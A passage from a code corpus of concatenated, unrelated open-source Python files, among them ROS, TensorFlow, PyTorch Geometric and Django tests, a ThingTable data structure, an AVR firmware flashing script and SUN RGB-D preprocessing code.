'/action_1' server = None def execute_cb(goal): rospy.sleep(.5) if server.is_preempt_requested(): server.set_preempted() else: server.set_succeeded(BehaviorExecutionResult(outcome='ok')) server = actionlib.SimpleActionServer(t1, BehaviorExecutionAction, execute_cb, auto_start=False) server.start() client = ProxyActionClient({t1: BehaviorExecutionAction}) self.assertFalse(client.has_result(t1)) client.send_goal(t1, BehaviorExecutionGoal()) rate = rospy.Rate(20) for i in range(20): self.assertTrue(client.is_active(t1) or client.has_result(t1)) rate.sleep() self.assertTrue(client.has_result(t1)) result = client.get_result(t1) self.assertEqual(result.outcome, 'ok') client.send_goal(t1, BehaviorExecutionGoal()) rospy.sleep(.1) client.cancel(t1) rospy.sleep(.9) self.assertFalse(client.is_active(t1)) self.assertFalse(client.is_available('/not_there')) client = ProxyActionClient({'/invalid': BehaviorExecutionAction}, wait_duration=.1) self.assertFalse(client.is_available('/invalid')) if __name__ == '__main__': rospy.init_node('test_flexbe_proxies') import rostest rostest.rosrun('flexbe_core', 'test_flexbe_proxies', TestProxies)
tests/test_activations.py
themantalope/DLTK
1,397
63441
import tensorflow as tf from dltk.core.activations import leaky_relu import numpy as np def test_leaky_relu(): test_alpha = tf.constant(0.1) test_inp_1 = tf.constant(1.) test_inp_2 = tf.constant(-1.) test_relu_1 = leaky_relu(test_inp_1, test_alpha) test_relu_2 = leaky_relu(test_inp_2, test_alpha) with tf.Session() as s: out_1 = s.run(test_relu_1) assert np.isclose(out_1, 1.), \ 'Got {} but expected {}'.format(out_1, 1.) out_2 = s.run(test_relu_2) assert np.isclose(out_2, -0.1), \ 'Got {} but expected {}'.format(out_2, -0.1)
text_extensions_for_pandas/array/thing_table.py
ZachEichen/text-extensions-for-pandas
193
63468
# # Copyright (c) 2021 IBM Corp. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import textwrap # # thing_table.py # # Part of text_extensions_for_pandas # # Data structure for managing collections of immutable items that implement # __hash__ and __eq__. Serves as a base class for StringTable # from abc import ABC, abstractmethod from typing import * import numpy as np class ThingTable(ABC): """ A set of immutable things, plus integer IDs for said things. Also implicitly maps `None` to ID -1. Serves as a base class for collections of specific things like strings and tokenizations. """ # Special integer ID for None as a thing. NONE_ID = -1 # Special integer ID for "not an id" NOT_AN_ID = -2 def __init__(self): # Bidirectional map from unique thing (possibly boxed for dictionary # compatibility) to integer ID and back self._boxed_thing_to_id = {} # type: Dict[Any, int] self._id_to_boxed_thing = [] # type: List[Any] self._total_bytes = 0 # type: int @abstractmethod def size_of_thing(self, thing: Any) -> int: """ :param thing: Thing to be insterted in this table :return: The number of bytes that the thing occupies in memory """ pass @abstractmethod def type_of_thing(self) -> Type: """ :return: Expected type of things that this table will manage """ pass def box(self, thing: Any) -> Any: """ Subclasses should override this method if they manage items that aren't compatible with Python dictionaries. :param thing: Thing to insert into the table :return: a dictionary-compatible boxed version of `thing`, if such boxing is needed to make `thing` dictionary-compatible. """ # Default implementation is a no-op return thing def unbox(self, boxed_thing: Any) -> Any: """ Subclasses should override this method if they manage items that aren't compatible with Python dictionaries. :param boxed_thing: Thing that was boxed by this class's `box` method. :return: Original thing that was passed to `box` """ # Default implementation is a no-op return boxed_thing @classmethod def create_single(cls, thing: Any): """ Factory method for building a table containing a single value at ID 0. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. """ # For now we return a fresh table each time. ret = cls() ret.maybe_add_thing(thing) return ret @classmethod def merge_tables_and_ids(cls, tables: Sequence["ThingTable"], int_ids: Sequence[np.ndarray]) \ -> Tuple["ThingTable", np.ndarray]: """ Factory method for combining together multiple references to different ThingTables into references to a new, combined ThingTable of the same type. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. :param tables: A list of (possibly) different mappings from int to string :param int_ids: List of lists of integer IDs that decode to strings via the corresponding elements of `tables`. :returns: A tuple containing: * A new, merged table containing all the unique things under `tables` that are referenced in `int_ids` (and possibly additional things that aren't referenced) * Numpy arrays of integer offsets into the new table, corresponding to the elements of `int_ids` """ if len(tables) != len(int_ids): raise ValueError(f"Got {len(tables)} {cls}s " f"and {len(int_ids)} lists of IDs.") # TODO: Add fast-path code here to pass through the first table if # both input tables are identical. new_table = cls() new_ids_list = [] for i in range(len(tables)): old_table = tables[i] if not isinstance(old_table, cls): raise TypeError(f"Expected table of type {cls}, but got " f"{type(old_table)}") old_ids = int_ids[i] if len(old_ids.shape) != 1: raise ValueError(f"Invalid shape for IDs {old_ids}") new_ids = np.empty_like(old_ids, dtype=int) old_id_to_new_id = [ new_table.maybe_add_thing(old_table.id_to_thing(j)) for j in range(old_table.num_things) ] for j in range(len(old_ids)): new_ids[j] = old_id_to_new_id[old_ids[j]] new_ids_list.append(new_ids) return new_table, new_ids_list @classmethod def merge_things(cls, things: Union[Sequence[Any], np.ndarray]): f""" Factory method for bulk-adding multiple things to create a single ThingTable and a list of integer IDs against that ThingTable. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. :param things: things to be de-duplicated and converted to a ThingTable. :returns: Two values: * A ThingTable containing (at least) all the unique strings in `strings` * A Numppy array of integer string IDs against the returned ThingTable, where each ID maps to the corresponding element of `strings` """ new_table = cls() str_ids = np.empty(len(things), dtype=int) for i in range(len(things)): str_ids[i] = new_table.maybe_add_thing(things[i]) return new_table, str_ids @classmethod def from_things(cls, things: Union[Sequence[Any], np.ndarray]): """ Factory method for creating a ThingTable from a sequence of unique things. :param things: sequence of unique things to be added to the ThingTable. :return: A ThingTable containing the elements of `things`. """ new_table = cls() for thing in things: new_table.add_thing(thing) return new_table def thing_to_id(self, thing: Any) -> int: """ :param thing: A thing to look up in this table :returns: One of: * The integer ID of the indicated thing, if present. * `ThingTable.NONE_ID` if thing is None * `ThingTable.NOT_AN_ID` if thing is not present in the table """ if thing is None: # By convention, None maps to -1 return ThingTable.NONE_ID elif not isinstance(thing, self.type_of_thing()): raise TypeError(f"Expected an object of type {self.type_of_thing()}, " f"but received an object of type {type(thing)}") else: # Remaining branches require boxing for dictionary lookup boxed_thing = self.box(thing) if boxed_thing not in self._boxed_thing_to_id: return ThingTable.NOT_AN_ID else: return self._boxed_thing_to_id[boxed_thing] def id_to_thing(self, int_id: Union[int, np.int64, np.int32]) -> Any: """ :param int_id: Integer ID that is potentially associated with a thing in the table :return: The associated thing, if present, or `None` if no thing is associated with the indicated ID. """ if not isinstance(int_id, (int, np.int64, np.int32)): raise TypeError(f"Expected integer, but received {int_id} " f"of type {type(int_id)}") elif int_id <= ThingTable.NOT_AN_ID: raise ValueError(f"Invalid ID {int_id}") elif ThingTable.NONE_ID == int_id: return None else: boxed_thing = self._id_to_boxed_thing[int_id] return self.unbox(boxed_thing) def ids_to_things(self, int_ids: Union[Sequence[int], np.ndarray]) -> np.ndarray: """ Vectorized version of :func:`id_to_string` for translating multiple IDs at once. :param int_ids: Multiple integer IDs to be translated to strings :returns: A numpy array of string objects. """ if not isinstance(int_ids, np.ndarray): int_ids = np.array(int_ids, dtype=int) if len(int_ids.shape) != 1: raise TypeError(f"Invalid shape {int_ids.shape} for array of integer IDs.") ret = np.empty(len(int_ids), dtype=object) for i in range(len(int_ids)): ret[i] = self.id_to_thing(int_ids[i].item()) return ret def add_thing(self, thing: Any) -> int: """ Adds a thing to the table. Raises a ValueError if the thing is already present. :param thing: Thing to add :return: unique ID for this thing """ if not isinstance(thing, self.type_of_thing()): raise TypeError(f"Expected an object of type {self.type_of_thing()}, " f"but received an object of type {type(thing)}") # Box for dictionary compatibility boxed_thing = self.box(thing) if boxed_thing in self._boxed_thing_to_id: raise ValueError(f"'{textwrap.shorten(str(thing), 40)}' already in table") new_id = len(self._id_to_boxed_thing) self._id_to_boxed_thing.append(boxed_thing) self._boxed_thing_to_id[boxed_thing] = new_id self._total_bytes += self.size_of_thing(thing) return new_id def maybe_add_thing(self, thing: Any) -> int: """ Adds a thing to the table if it is not already present. :param thing: Thing to add :return: unique ID for this thing """ if not isinstance(thing, self.type_of_thing()): raise TypeError(f"Expected an object of type {self.type_of_thing()}, " f"but received an object of type {type(thing)}") current_id = self.thing_to_id(thing) if current_id != ThingTable.NOT_AN_ID: return current_id else: return self.add_thing(thing) def maybe_add_things(self, s: Sequence[Any]) -> np.ndarray: """ Vectorized version of :func:`maybe_add_thing` for translating, and potentially adding multiple things at once. :param s: Multiple things to be translated and potentially added :returns: A numpy array of the corresponding integer IDs for the things. Adds each things to the table if it is not already present. """ result = np.empty(len(s), dtype=np.int32) for i in range(len(result)): result[i] = self.maybe_add_thing(s[i]) return result def nbytes(self): """ Number of bytes in a (currently hypothetical) serialized version of this table. """ return self._total_bytes @property def num_things(self) -> int: """ :return: Number of distinct things in the table """ return len(self._id_to_boxed_thing) @property def things(self) -> Iterator[Any]: """ :return: Iterator over the unique things stored in this table. """ return (self.unbox(thing) for thing in self._id_to_boxed_thing) @property def ids(self) -> Iterator[int]: """ :return: Iterator over the IDs of things stored in this table, including the implicit ID ThingTable.NONE_ID """ if ThingTable.NONE_ID != -1: raise ValueError("Someone has changed the value of NONE_ID; need to rewrite " "this function.") return range(-1, len(self._id_to_boxed_thing)) def things_to_ids(self, things: Sequence[Any]) -> np.ndarray: """ Vectorized version of :func:`thing_to_id` for translating multiple things at once. :param things: Multiple things to be translated to IDs. Must be already in the table's set of things. :returns: A numpy array of the same integers that :func:`thing_to_id` would return. """ ret = np.empty(len(things), dtype=np.int32) for i in range(len(things)): ret[i] = self.thing_to_id(things[i]) return ret
flash2560.py
kaleidoscopeit/esp-link
2,522
63482
#!/usr/bin/env python # ---------------------------------------------------------------------------- # "THE BEER-WARE LICENSE" (Revision 42): # <NAME> wrote this file. As long as you retain # this notice you can do whatever you want with this stuff. If we meet some day, # and you think this stuff is worth it, you can buy me a beer in return. # ---------------------------------------------------------------------------- import sys import re import requests import platform # For getting the operating system name import subprocess # For executing a shell command import os import time ip_regex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$" def main(argv): print("--- flash2560 - Created by <NAME> ---") hostname = "192.168.4.1" input_file = "none" # Handle the command line arguments for index, arg in enumerate(argv): if arg == "-h" or arg == "--help": print_help() sys.exit(0) elif arg == "-H" or arg == "--hostname": if index + 1 < len(argv) and re.search(ip_regex, argv[index + 1]): hostname = argv[index + 1] if not ping(hostname): print("IP is not reachable:") sys.exit(2) else: print("IP address is not right") print_help() sys.exit(1) elif arg == "-f" or arg == "--file": if index + 1 < len(argv) and os.path.isfile(argv[index + 1]): input_file = argv[index + 1] else: print("Can't open file") print_help() sys.exit(3) if input_file == "none": print("No input file") print_help() sys.exit(4) response = requests.post('http://' + hostname + '/pgmmega/sync') # ------------ GET AVR in SYNC ---------------------------------------- if response.status_code != 204: print("Failed to reset the AVR (HTML ERROR: " + response.status_code + ")") sys.exit(5) while True: response = requests.get('http://' + hostname + '/pgmmega/sync') if "SYNC" in response.content.decode('ASCII'): print(response.content) break elif "NOT READY" not in response.content.decode('ASCII'): print("Could not get in Sync with AVR") sys.exit(7) time.sleep(0.1) # -------------- Upload HEX file ----------------------------------------- hex_file = open(input_file).read() response = requests.post('http://' + hostname + '/pgmmega/upload', data=hex_file, timeout=20.0) if "Success" in response.content.decode('ASCII'): print("+++++ Success :) ++++++") else: print("Failed :(") sys.exit(8) # Reset the avr to solve a bug in the bootloader that the program dows not start immediately time.sleep(0.1) requests.post('http://' + hostname + '/console/reset') sys.exit(0) def print_help(): print('\n') print("Usage: ") print("flash2560.py -H <hostname> -f <hex_file>") print("\nExample:") print("flash2560.py -H 192.168.4.1 -f Sketch.hex") def ping(host): param = '-n' if platform.system().lower() == 'windows' else '-c' command = ['ping', param, '1', host] output = open(os.devnull, 'w') return subprocess.call(command, stdout=output) == 0 if __name__ == "__main__": main(sys.argv[1:])
openbook_categories/serializers.py
TamaraAbells/okuna-api
164
63484
from rest_framework import serializers from openbook_categories.models import Category class GetCategoriesCategorySerializer(serializers.ModelSerializer): class Meta: model = Category fields = ( 'id', 'name', 'title', 'description', 'avatar', 'color' )
lightnlp/sl/ner/utils/convert.py
CNLPT/lightNLP
889
63490
def iob_ranges(words, tags): """ IOB -> Ranges """ assert len(words) == len(tags) ranges = [] def check_if_closing_range(): if i == len(tags) - 1 or tags[i + 1].split('_')[0] == 'O': ranges.append({ 'entity': ''.join(words[begin: i + 1]), 'type': temp_type, 'start': begin, 'end': i }) for i, tag in enumerate(tags): if tag.split('_')[0] == 'O': pass elif tag.split('_')[0] == 'B': begin = i temp_type = tag.split('_')[1] check_if_closing_range() elif tag.split('_')[0] == 'I': check_if_closing_range() return ranges
CGI/simple-server-with-different-languages/cgi-bin/download.py
whitmans-max/python-examples
140
63557
<filename>CGI/simple-server-with-different-languages/cgi-bin/download.py #!/usr/bin/env python import os import sys fullpath = 'images/normal.png' filename = 'hello_world.png' # headers print 'Content-Type: application/octet-stream; name="%s"' % filename print 'Content-Disposition: attachment; filename="%s"' % filename print "Content-Length: " + str(os.stat(fullpath).st_size) print # empty line between headers and body #sys.stdout.flush() # send header faster try: # body with open(fullpath, 'rb') as fo: print fo.read() except Exception as e: print 'Content-type:text/html' print # empty line between headers and body print 'Exception:', e
foreman/data_refinery_foreman/foreman/management/commands/test_import_external_sample_attributes.py
AlexsLemonade/refinebio
106
63570
from unittest.mock import patch from django.test import TestCase import vcr from data_refinery_common.models import ( Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute, ) from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import ( Command, import_metadata, import_sample_attributes, ) TEST_METADATA = "/home/user/data_store/externally_supplied_metadata/test_data/metadata.json" class ImportExternalSampleAttributesTestCase(TestCase): def setUp(self): experiment = Experiment() experiment.accession_code = "GSE000" experiment.alternate_accession_code = "E-GEOD-000" experiment.title = "NONONONO" experiment.description = "Boooooourns. Wasabi." experiment.technology = "RNA-SEQ" experiment.save() self.experiment = experiment # Create some samples to attach metadata to sample = Sample() sample.accession_code = "SRR123" sample.technology = "RNA-SEQ" sample.source_database = "SRA" sample.title = "Not important" sample.save() experiment_sample_association = ExperimentSampleAssociation() experiment_sample_association.sample = sample experiment_sample_association.experiment = experiment experiment_sample_association.save() sample2 = Sample() sample2.accession_code = "SRR456" sample2.technology = "RNA-SEQ" sample2.source_database = "SRA" sample2.title = "Not important" sample2.save() experiment_sample_association = ExperimentSampleAssociation() experiment_sample_association.sample = sample2 experiment_sample_association.experiment = experiment experiment_sample_association.save() # Create the ontology terms I'm using in the tests name = OntologyTerm() name.ontology_term = "PATO:0000122" name.human_readable_name = "length" name.save() unit = OntologyTerm() unit.ontology_term = "UO:0010012" unit.human_readable_name = "thou" unit.save() contribution = Contribution() contribution.source_name = "refinebio_tests" contribution.methods_url = "ccdatalab.org" contribution.save() self.contribution = contribution # # Test import_sample_attributes() # def test_skip_unknown_sample(self): """Make sure that if someone has metadata for a sample that we haven't surveyed then we just do nothing""" METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}] import_sample_attributes("SRR789", METADATA, self.contribution) self.assertEqual(SampleAttribute.objects.all().count(), 0) def test_import_invalid_ontology_term(self): METADATA = [{"PATO:0000122": {"value": 25, "unit": "thou"}}] self.assertRaises( ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution ) METADATA = [{"length": {"value": 25, "unit": "UO:0010012"}}] self.assertRaises( ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution ) def test_import_valid_sample_attributes(self): METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}] import_sample_attributes("SRR123", METADATA, self.contribution) self.assertEqual(SampleAttribute.objects.all().count(), 1) contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata self.assertEqual( contributed_metadata[self.contribution.source_name]["length"], {"unit": "thou", "value": 25}, ) # # Test import_metadata() # def test_import_valid_metadata(self): METADATA = [ { "sample_accession": "SRR123", "attributes": [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}], } ] import_metadata(METADATA, self.contribution) self.assertEqual(SampleAttribute.objects.all().count(), 1) contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata self.assertEqual( contributed_metadata[self.contribution.source_name]["length"], {"unit": "thou", "value": 25}, ) # # End-to-end test # @vcr.use_cassette("/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml") def test_management_command(self): sample = Sample() sample.accession_code = "DRR001173" sample.technology = "RNA-SEQ" sample.source_database = "SRA" sample.title = "Not important" sample.save() command = Command() SOURCE_NAME = "refinebio_tests" command.handle(file=TEST_METADATA, source_name=SOURCE_NAME, methods_url="ccdatalab.org") self.assertEqual(SampleAttribute.objects.all().count(), 1) contributed_metadata = sample.contributed_metadata self.assertEqual( set(contributed_metadata[SOURCE_NAME]["biological sex"].keys()), {"value", "confidence"}, ) self.assertEqual( contributed_metadata[SOURCE_NAME]["biological sex"]["value"].human_readable_name, "female", ) self.assertAlmostEqual( contributed_metadata[SOURCE_NAME]["biological sex"]["confidence"], 0.7856624891880539 )
flags/tests/test_management_commands_enable_flag.py
mdunc/django-flags
142
63660
from io import StringIO from django.core.management import call_command from django.core.management.base import CommandError from django.test import TestCase from flags.state import flag_enabled class EnableFlagTestCase(TestCase): def test_enable_flag(self): out = StringIO() self.assertFalse(flag_enabled("DB_FLAG")) call_command("enable_flag", "DB_FLAG", stdout=out) self.assertTrue(flag_enabled("DB_FLAG")) self.assertIn("Successfully enabled", out.getvalue()) def test_enable_flag_non_existent_flag(self): with self.assertRaises(CommandError): call_command("enable_flag", "FLAG_DOES_NOT_EXIST")
test/loader/test_link_neighbor_loader.py
NucciTheBoss/pytorch_geometric
2,350
63665
<filename>test/loader/test_link_neighbor_loader.py import pytest import torch from torch_geometric.data import Data, HeteroData from torch_geometric.loader import LinkNeighborLoader def get_edge_index(num_src_nodes, num_dst_nodes, num_edges): row = torch.randint(num_src_nodes, (num_edges, ), dtype=torch.long) col = torch.randint(num_dst_nodes, (num_edges, ), dtype=torch.long) return torch.stack([row, col], dim=0) def unique_edge_pairs(edge_index): return set(map(tuple, edge_index.t().tolist())) @pytest.mark.parametrize('directed', [True, False]) @pytest.mark.parametrize('neg_sampling_ratio', [0.0, 1.0]) def test_homogeneous_link_neighbor_loader(directed, neg_sampling_ratio): torch.manual_seed(12345) pos_edge_index = get_edge_index(100, 50, 500) neg_edge_index = get_edge_index(100, 50, 500) neg_edge_index[1, :] += 50 edge_label_index = torch.cat([pos_edge_index, neg_edge_index], dim=-1) edge_label = torch.cat([torch.ones(500), torch.zeros(500)], dim=0) data = Data() data.edge_index = pos_edge_index data.x = torch.arange(100) data.edge_attr = torch.arange(500) loader = LinkNeighborLoader( data, num_neighbors=[-1] * 2, batch_size=20, edge_label_index=edge_label_index, edge_label=edge_label if neg_sampling_ratio == 0.0 else None, directed=directed, neg_sampling_ratio=neg_sampling_ratio, shuffle=True, ) assert str(loader) == 'LinkNeighborLoader()' assert len(loader) == 1000 / 20 for batch in loader: assert isinstance(batch, Data) assert len(batch) == 5 assert batch.x.size(0) <= 100 assert batch.x.min() >= 0 and batch.x.max() < 100 assert batch.edge_index.min() >= 0 assert batch.edge_index.max() < batch.num_nodes assert batch.edge_attr.min() >= 0 assert batch.edge_attr.max() < 500 if neg_sampling_ratio == 0.0: assert batch.edge_label_index.size(1) == 20 # Assert positive samples are present in the original graph: edge_index = unique_edge_pairs(batch.edge_index) edge_label_index = batch.edge_label_index[:, batch.edge_label == 1] edge_label_index = unique_edge_pairs(edge_label_index) assert len(edge_index | edge_label_index) == len(edge_index) # Assert negative samples are not present in the original graph: edge_index = unique_edge_pairs(batch.edge_index) edge_label_index = batch.edge_label_index[:, batch.edge_label == 0] edge_label_index = unique_edge_pairs(edge_label_index) assert len(edge_index & edge_label_index) == 0 else: assert batch.edge_label_index.size(1) == 40 assert torch.all(batch.edge_label[:20] == 1) assert torch.all(batch.edge_label[20:] == 0) @pytest.mark.parametrize('directed', [True, False]) @pytest.mark.parametrize('neg_sampling_ratio', [0.0, 1.0]) def test_heterogeneous_link_neighbor_loader(directed, neg_sampling_ratio): torch.manual_seed(12345) data = HeteroData() data['paper'].x = torch.arange(100) data['author'].x = torch.arange(100, 300) data['paper', 'paper'].edge_index = get_edge_index(100, 100, 500) data['paper', 'paper'].edge_attr = torch.arange(500) data['paper', 'author'].edge_index = get_edge_index(100, 200, 1000) data['paper', 'author'].edge_attr = torch.arange(500, 1500) data['author', 'paper'].edge_index = get_edge_index(200, 100, 1000) data['author', 'paper'].edge_attr = torch.arange(1500, 2500) loader = LinkNeighborLoader( data, num_neighbors=[-1] * 2, edge_label_index=('paper', 'author'), batch_size=20, directed=directed, neg_sampling_ratio=neg_sampling_ratio, shuffle=True, ) assert str(loader) == 'LinkNeighborLoader()' assert len(loader) == 1000 / 20 for batch in loader: assert isinstance(batch, HeteroData) if neg_sampling_ratio == 0.0: assert len(batch) == 4 # Assert positive samples are present in the original graph: edge_index = unique_edge_pairs(batch['paper', 'author'].edge_index) edge_label_index = batch['paper', 'author'].edge_label_index edge_label_index = unique_edge_pairs(edge_label_index) assert len(edge_index | edge_label_index) == len(edge_index) else: assert len(batch) == 5 assert batch['paper', 'author'].edge_label_index.size(1) == 40 assert torch.all(batch['paper', 'author'].edge_label[:20] == 1) assert torch.all(batch['paper', 'author'].edge_label[20:] == 0) @pytest.mark.parametrize('directed', [True, False]) def test_heterogeneous_link_neighbor_loader_loop(directed): torch.manual_seed(12345) data = HeteroData() data['paper'].x = torch.arange(100) data['author'].x = torch.arange(100, 300) data['paper', 'paper'].edge_index = get_edge_index(100, 100, 500) data['paper', 'author'].edge_index = get_edge_index(100, 200, 1000) data['author', 'paper'].edge_index = get_edge_index(200, 100, 1000) loader = LinkNeighborLoader(data, num_neighbors=[-1] * 2, edge_label_index=('paper', 'paper'), batch_size=20, directed=directed) for batch in loader: assert batch['paper'].x.size(0) <= 100 assert batch['paper'].x.min() >= 0 and batch['paper'].x.max() < 100 # Assert positive samples are present in the original graph: edge_index = unique_edge_pairs(batch['paper', 'paper'].edge_index) edge_label_index = batch['paper', 'paper'].edge_label_index edge_label_index = unique_edge_pairs(edge_label_index) assert len(edge_index | edge_label_index) == len(edge_index) def test_link_neighbor_loader_edge_label(): torch.manual_seed(12345) edge_index = get_edge_index(100, 100, 500) data = Data(edge_index=edge_index, x=torch.arange(100)) loader = LinkNeighborLoader( data, num_neighbors=[-1] * 2, batch_size=10, neg_sampling_ratio=1.0, ) for batch in loader: assert batch.edge_label.dtype == torch.float assert torch.all(batch.edge_label[:10] == 1.0) assert torch.all(batch.edge_label[10:] == 0.0) loader = LinkNeighborLoader( data, num_neighbors=[-1] * 2, batch_size=10, edge_label=torch.ones(500, dtype=torch.long), neg_sampling_ratio=1.0, ) for batch in loader: assert batch.edge_label.dtype == torch.long assert torch.all(batch.edge_label[:10] == 2) assert torch.all(batch.edge_label[10:] == 0)
chakin/downloader.py
massongit/chakin
334
63675
# -*- coding: utf-8 -*- import os import pandas as pd from progressbar import Bar, ETA, FileTransferSpeed, ProgressBar, Percentage, RotatingMarker from six.moves.urllib.request import urlretrieve def load_datasets(path=os.path.join(os.path.dirname(__file__), 'datasets.csv')): datasets = pd.read_csv(path) return datasets def download(number=-1, name="", save_dir='./'): """Download pre-trained word vector :param number: integer, default ``None`` :param save_dir: str, default './' :return: file path for downloaded file """ df = load_datasets() if number > -1: row = df.iloc[[number]] elif name: row = df.loc[df["Name"] == name] url = ''.join(row.URL) if not url: print('The word vector you specified was not found. Please specify correct name.') widgets = ['Test: ', Percentage(), ' ', Bar(marker=RotatingMarker()), ' ', ETA(), ' ', FileTransferSpeed()] pbar = ProgressBar(widgets=widgets) def dlProgress(count, blockSize, totalSize): if pbar.max_value is None: pbar.max_value = totalSize pbar.start() pbar.update(min(count * blockSize, totalSize)) file_name = url.split('/')[-1] if not os.path.exists(save_dir): os.makedirs(save_dir) save_path = os.path.join(save_dir, file_name) path, _ = urlretrieve(url, save_path, reporthook=dlProgress) pbar.finish() return path def search(lang=''): """Search pre-trained word vectors by their language :param lang: str, default '' :return: None print search result as pandas DataFrame """ df = load_datasets() if lang == '': print(df[['Name', 'Dimension', 'Corpus', 'VocabularySize', 'Method', 'Language', 'Author']]) else: rows = df[df.Language==lang] print(rows[['Name', 'Dimension', 'Corpus', 'VocabularySize', 'Method', 'Language', 'Author']])
script/build_day_stat.py
khamdamoff/daysandbox_bot
101
63689
<gh_stars>100-1000 from collections import Counter from datetime import datetime, timedelta from database import connect_db def setup_arg_parser(parser): parser.add_argument('days_ago', type=int, default=0) def get_chat_id(event): return event.get('chat_id', event['chat']['id']) def main(days_ago, **kwargs): db = connect_db() day = datetime.utcnow().replace( hour=0, minute=0, second=0, microsecond=0 ) for x in range(days_ago + 1): start = day - timedelta(days=x) end = start + timedelta(days=1) query = { 'type': 'delete_msg', 'date': { '$gte': start, '$lt': end, }, } del_count = 0 chat_reg = set() for event in db.event.find(query): del_count += 1 chat_reg.add(get_chat_id(event)) db.day_stat.find_one_and_update( {'date': start}, {'$set': { 'delete_msg': del_count, 'chat': len(chat_reg), }}, upsert=True, ) print('Date: %s' % start) print(' * delete_msg: %d' % del_count) print(' * chat: %d' % len(chat_reg))
asreview/query_strategies.py
DominiqueMaciejewski/asreview
280
63702
# Copyright 2019-2020 The ASReview Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from asreview.models.deprecated import _moved_warning from asreview.models.query.max import MaxQuery as _MaxQuery from asreview.models.query.mixed import MixedQuery as _MixedQuery from asreview.models.query.uncertainty import UncertaintyQuery as _UncertaintyQuery from asreview.models.query.random import RandomQuery as _RandomQuery from asreview.models.query.cluster import ClusterQuery as _ClusterQuery from asreview.models.query.utils import get_query_model as _get_query_model from asreview.models.query.utils import get_query_class as _get_query_class from asreview.models.query.utils import list_query_strategies as _list_query_strategies """Deprecated, will be removed in version 1.0""" MaxQuery = _moved_warning( _MaxQuery, "asreview.models.query.MaxQuery", "asreview.query_strategies.MaxQuery") MixedQuery = _moved_warning( _MixedQuery, "asreview.models.query.MixedQuery", "asreview.query_strategies.MixedQuery") UncertaintyQuery = _moved_warning( _UncertaintyQuery, "asreview.models.query.UncertaintyQuery", "asreview.query_strategies.UncertaintyQuery") RandomQuery = _moved_warning( _RandomQuery, "asreview.models.query.RandomQuery", "asreview.query_strategies.RandomQuery") ClusterQuery = _moved_warning( _ClusterQuery, "asreview.models.query.ClusterQuery", "asreview.query_strategies.ClusterQuery") get_query_model = _moved_warning( _get_query_model, "asreview.models.query.get_query_model", "asreview.query_strategies.get_query_model") get_query_class = _moved_warning( _get_query_class, "asreview.models.query.get_query_class", "asreview.query_strategies.get_query_class") list_query_strategies = _moved_warning( _list_query_strategies, "asreview.models.query.list_query_strategies", "asreview.query_strategies.list_query_strategies")
sunrgbd/prepare_data.py
lemontyc/frustum-convnet
247
63710
''' Helper class and functions for loading SUN RGB-D objects Author: <NAME> Date: October 2017 Modified by <NAME> ''' import os import sys import numpy as np import pickle import argparse from PIL import Image BASE_DIR = os.path.dirname(os.path.abspath(__file__)) sys.path.append(BASE_DIR) import sunrgbd_utils as utils from sunrgbd_object import sunrgbd_object from sunrgbd_utils import random_shift_box2d, extract_pc_in_box3d def ravel_hash(coord): assert coord.ndim == 2 coord -= coord.min(0) coord_max = coord.max(0) + 1 keys = np.zeros(coord.shape[0], dtype=np.int64) for i in range(coord.shape[1] - 1): keys += coord[:, i] keys *= coord_max[i + 1] keys += coord[:, -1] return keys def down_sample(x, voxel_size=(0.05, )): if isinstance(voxel_size, float): voxel_size = (voxel_size, ) if len(voxel_size) == 1: voxel_size = voxel_size * 3 voxel_size = np.array(voxel_size, dtype=np.float32) voxel_index = np.floor(x / voxel_size).astype(np.int64, copy=False) hash_keys = ravel_hash(voxel_index) _, idx = np.unique(hash_keys, return_index=True) return idx def get_box3d_dim_statistics(my_sunrgbd_dir, idx_filename, type_whitelist): dataset = sunrgbd_object(my_sunrgbd_dir) dimension_list = [] type_list = [] data_idx_list = [int(line.rstrip()) for line in open(idx_filename)] for data_idx in data_idx_list: print('------------- ', data_idx) objects = dataset.get_label_objects(data_idx) for obj_idx in range(len(objects)): obj = objects[obj_idx] if obj.classname not in type_whitelist: continue dimension_list.append(np.array([obj.l, obj.w, obj.h])) type_list.append(obj.classname) print("number of objects: {} ".format(len(type_list))) print("categories:", list(sorted(type_whitelist))) # Get average box size for different categories for class_type in sorted(set(type_list)): cnt = 0 box3d_list = [] for i in range(len(dimension_list)): if type_list[i] == class_type: cnt += 1 box3d_list.append(dimension_list[i]) median_box3d = np.median(box3d_list, 0) print("\'%s\': np.array([%f,%f,%f])," % (class_type, median_box3d[0] * 2, median_box3d[1] * 2, median_box3d[2] * 2)) def read_det_file(det_file): id_list = [] type_list = [] prob_list = [] box2d_list = [] # data_idx, type_list, prob, box2d with open(det_file, 'rt') as f: for line in f: t = line.rstrip().split(" ") id_list.append(int(t[0])) type_list.append(t[1]) prob_list.append(float(t[2])) box2d_list.append(np.array([float(t[i]) for i in range(3, 7)])) return 